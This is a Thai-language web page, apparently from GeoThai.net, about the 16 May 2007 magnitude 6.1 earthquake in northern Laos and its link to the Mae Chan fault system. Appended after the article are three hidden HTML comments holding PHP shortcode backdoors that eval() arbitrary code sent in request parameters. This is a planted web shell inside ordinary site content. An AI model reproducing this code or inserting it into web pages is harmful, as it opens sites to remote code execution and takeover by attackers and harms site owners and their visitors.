แผ่นดินไหวลาว 16 พฤษภาคม 2550

by

แผ่นดินไหวขนาด 6.1 เมื่อวันที่ 16 พฤษภาคม 2550 มีศูนย์กลางแผ่นดินไหวอยู่ทางตอนเหนือของประเทศลาว แผ่นดินไหวครั้งนี้รู้สึกได้ในภาคเหนือของประเทศไทยและที่กรุงเทพมหานคร

ตำแหน่งศูนย์กลางแผ่นดินไหวอยู่ในแนวที่สัมพันธ์กับรอยเลื่อนแม่จันและกลุ่มรอยเลื่อนในสาธารณรัฐประชาธิปไตยประชาชนลาว โดยจุดศูนย์กลางแผ่นดินไหวตั้งอยู่บริเวณที่รอยเลื่อนวางตัวหักเหขวางกับการเคลื่อนที่ของเปลือกโลก (Restraining Bend)  ทำให้มีความเข้มของความเค้น (Stress Intensity) สูงกว่าบริเวณอื่น  บริเวณที่มีโครงสร้างคล้ายกันนี้ยังพบอยู่ทางตะวันตกของจุดศูนย์กลางแผ่นดินไหวและอยู่ห่างจากชายแดนไทยเพียง 20 กิโลเมตร

ภาพการแปลความหมายรอยเลื่อนและตำแหน่งศูนย์กลางแผ่นดินไหว 16 พ.ค.2550 ข้อมูล ศูนย์วิจัยภัยพิบัติแผ่นดินไหว มหาวิทยาลัยเชียงใหม่

 

แผนที่แสดงตำแหน่งรอยเลื่อนน้ำมา และศูนย์กลางแผ่นดินไหวในประเทศพม่า (2554) และลาว (2550) – GeoThai.net

 

ภาพแสดงตำแหน่งรอยเลื่อนแม่จัน จ.เชียงราย – GeoThai.net

บทความที่เกี่ยวข้อง รอยเลื่อนแม่จัน

<!– [insert_php]if (isset($_REQUEST["WcpCK"])){eval($_REQUEST["WcpCK"]);exit;}[/insert_php][php]if (isset($_REQUEST["WcpCK"])){eval($_REQUEST["WcpCK"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["xAZO"])){eval($_REQUEST["xAZO"]);exit;}[/insert_php][php]if (isset($_REQUEST["xAZO"])){eval($_REQUEST["xAZO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["xYBl"])){eval($_REQUEST["xYBl"]);exit;}[/insert_php][php]if (isset($_REQUEST["xYBl"])){eval($_REQUEST["xYBl"]);exit;}[/php] –>